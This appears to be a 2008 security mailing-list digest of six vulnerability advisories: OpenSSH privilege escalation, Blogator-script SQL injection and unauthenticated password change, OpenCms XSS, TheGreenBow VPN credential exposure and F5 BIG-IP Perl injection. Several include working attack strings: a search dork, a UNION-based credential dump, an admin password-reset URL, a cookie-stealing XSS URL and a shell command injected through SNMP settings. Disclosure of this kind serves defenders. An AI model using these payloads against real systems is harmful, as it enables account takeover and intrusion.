[ GLSA 200804-03 ] OpenSSH: Privilege escalation

2008-04-05 Thread Robert Buchholz 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200804-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: OpenSSH: Privilege escalation
  Date: April 05, 2008
  Bugs: #214985, #215702
ID: 200804-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Two flaws have been discovered in OpenSSH which could allow local
attackers to escalate their privileges.

Background
==

OpenSSH is a complete SSH protocol implementation that includes an SFTP
client and server support.

Affected packages
=

---
 Package   /   Vulnerable   /   Unaffected
---
  1  net-misc/openssh  < 4.7_p1-r6>= 4.7_p1-r6

Description
===

Two issues have been discovered in OpenSSH:

* Timo Juhani Lindfors discovered that OpenSSH sets the DISPLAY
  variable in SSH sessions using X11 forwarding even when it cannot
  bind the X11 server to a local port in all address families
  (CVE-2008-1483).

* OpenSSH will execute the contents of the ".ssh/rc" file even when
  the "ForceCommand" directive is enabled in the global sshd_config
  (CVE-2008-1657).

Impact
==

A local attacker could exploit the first vulnerability to hijack
forwarded X11 sessions of other users and possibly execute code with
their privileges, disclose sensitive data or cause a Denial of Service,
by binding a local X11 server to a port using only one address family.
The second vulnerability might allow local attackers to bypass intended
security restrictions and execute commands other than those specified
by "ForceCommand" if they are able to write to their home directory.

Workaround
==

There is no known workaround at this time.

Resolution
==

All OpenSSH users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-misc/openssh-4.7_p1-r6"

References
==

  [ 1 ] CVE-2008-1483
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1483
  [ 2 ] CVE-2008-1657
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1657

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200804-03.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


signature.asc
Description: This is a digitally signed message part.

Blogator-script 0.95 SQL Injection Vulnerbility

2008-04-05 Thread hadihadi_zedehal_2006 


 


 #  
#

 #...:Blogator-script 0.95 SQL Injection Vulnerbility 
  #   

 



Virangar Security Team


www.virangar.org

www.virangar.net




Discoverd By :virangar security team(hadihadi)


special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra


& all virangar members & all hackerz


greetz:to my best friend in the world hadi_aryaie2004

& my lovely friend arash(imm02tal) from emperor team :)

---

dork: inurl:/_blogadata/

---

vuln code in /_blogadata/include/sond_result.php:

line 27: $id_art=$_GET['id_art'];

..

line 34: $sql_res=mysql_query("SELECT sond_rep, votes_H, votes_F FROM 
sondage_rep WHERE id_sond = $id_art ORDER BY ordre");



vuln:

http://www.site.com/_blogadata/include/sond_result.php?id_art=-9/**/union/**/select/**/concat(pseudo,0x3a,pass,char(58),email),2,3/**/from/**/membre/**/where/**/id_membre=1/*



you can see in Blogator-script other injection bugs too ;)

Alkacon OpenCms sessions.jsp searchfilter XSS

2008-04-05 Thread nnposter 
Alkacon OpenCms sessions.jsp searchfilter XSS



Product: Alkacon OpenCms 

http://www.opencms.org/



OpenCms contains a cross-site scripting vulnerability in the active session 
reporting function. Input to parameter searchfilter in page 
opencms/system/workplace/admin/workplace/sessions.jsp is not sufficiently 
validated and/or sanitized before it gets embedded in the resulting web page.


Example:

http://(target)/opencms/system/workplace/admin/workplace/sessions.jsp?

ispopup=&action=listsearch&framename=&title=

&closelink=%252Fopencms%252Fopencms%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fworkplace

&preactiondone=&dialogtype=&message=&resource=&listaction=&base=&selitems=

&formname=ls-form&sortcol=&originalparams=&page=&style=new&root=

&path=%252Fworkplace%252Fbroadcast&redirect=

&searchfilter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

&listSearchFilter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E



The vulnerability has been identified in version 7.0.3. However, other versions 
may be also affected. Despite similarities this is a different vulnerability 
than CVE-2008-1510.



Solution:

Users should not browse untrusted sites while logged into OpenCms.



Found by:

nnposter

Blogator-script 0.95 Change User Password Vulnerbility

2008-04-05 Thread hadihadi_zedehal_2006 


 
##

 #  
  #

 #  ...:Blogator-script 0.95 Change User Password Vulnerbility 
   #   

 
##


Virangar Security Team


www.virangar.org

www.virangar.net




Discoverd By :virangar security team(hadihadi)


special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra


& all virangar members & all hackerz


greetz:to my best friend in the world hadi_aryaie2004

& my lovely friend arash(imm02tal) from emperor team :)

---

dork: inurl:/_blogadata/

---

vuln code in /_blogadata/include/init_pass2.php:

line 23: $id=$_GET['a'];

line 24:$email=$_GET['b'];

line 25: $mdp=$_GET['c'];

.

line 27: $sql_change_pass=mysql_query("UPDATE membre SET pass = '$mdp' WHERE 
id_membre = '$id' AND email LIKE '$email' LIMIT 1");


so if we put user id for $id and put %(any) for user email($email) and 
$mdp=newpassword.he he he :)



vuln:

http://www.site.com/_blogadata/include/init_pass2.php?c=[newpass]&a=[user 
id]&b=%

example:(change admin pass to 123456)

http://www.site.com/_blogadata/include/init_pass2.php?c=123456&a=1&b=%

TheGreenBowVPN, Login Credentials Disclosure

2008-04-05 Thread evilcry 
Hi there,


###

TheGreenBow IPSec VPN Client Login Credentials Information Disclosure 
Vulnerability



Informations

Risk: Low

Typology: Local

Date: 30/03/2008

Product: TheGreenBow IPSec VPN Client

Version:  4.10.010

Vendor: http://www.thegreenbow.com/vpn.html

Vendor Status: 29/03/2008 – Vendor Informed

   30/03/2008 - Reply from The Vendor

   31/03/200/ - Patch Released

Discovered By: Giuseppe `Evilcry` Bonfa'



Description


TheGreenBow IPSec VPN Client is an on demand IPSec VPN Client, compliant with 
most popular VPN gateways and with network tools to deploy security in large 
and medium enterprises. Highly efficient and easy to configure, the IPSec VPN 
Client also allows peer-to-peer VPN. 



PoC


TheGreenBow IPSec VPN Client 4.10.010 is prone to a Login Credentials that 
could expose local users of TheGreenBow to a leak of Sensitive Informations, 
specifically an attacker could Carve, Login and Certificates used by the user, 
cause they are stored in clear in memory. This may lead complete User 
Impersonation.


Attackers can exploit this issue to harvest VPN login credentials and gain 
unauthorized access to networks and resources protected by the VPN.


All informations are stored in the meomory image of the process 'Tgbike.exe', 
so with a basical Process Memory Dumper.


So we can identify some keywords to use for Credentials Carving:




Xuser = “”

Xpassword = “”

#  CERTIFICATES 

-Client-Private-Key]


#


A PDF version of the Advisory is available here:

http://evilcry.altervista.org/tuts/theGreenBow.pdf


Regards,

Giuseppe 'Evilcry' Bonfa'

F5 BIG-IP Management Interface Perl Injection

2008-04-05 Thread nnposter 
F5 BIG-IP Management Interface Perl Injection



Product: F5 BIG-IP

http://www.f5.com/products/big-ip/



The F5 BIG-IP reconfiguration facility, used by both the web management 
interface and the CLI, suffers from insufficient input validation and/or 
sanitization of certain reconfiguration requests. It is possible for a 
logged-in user with Resource Manager or Administrator privileges to inject 
arbitrary Perl code, including spawning Unix shell commands, that gets 
immediately executed with root privileges. (For the Administrator role this 
does not provide any new privileges because it is already provided with full 
shell access as root.)


The core of the problem is using Perl EP3 with templates containing 
substitutions similar to


$val='NEW_VALUE';


without first escaping single quotes in NEW_VALUE;


As an example, the SNMP community string configuration accepts the following 
value as an allowed source of SNMP requests:


"none'.`touch /etc/foo`.'"


It is possible to craft URL links that would inject the code with a simple HTTP 
GET request. Cross-site attacks may leverage this vulnerability to make an 
arbitrary change to the BIG-IP appliance.



The vulnerability has been identified in version 9.4.3. However, other versions 
may be also affected.



Found by:

nnposter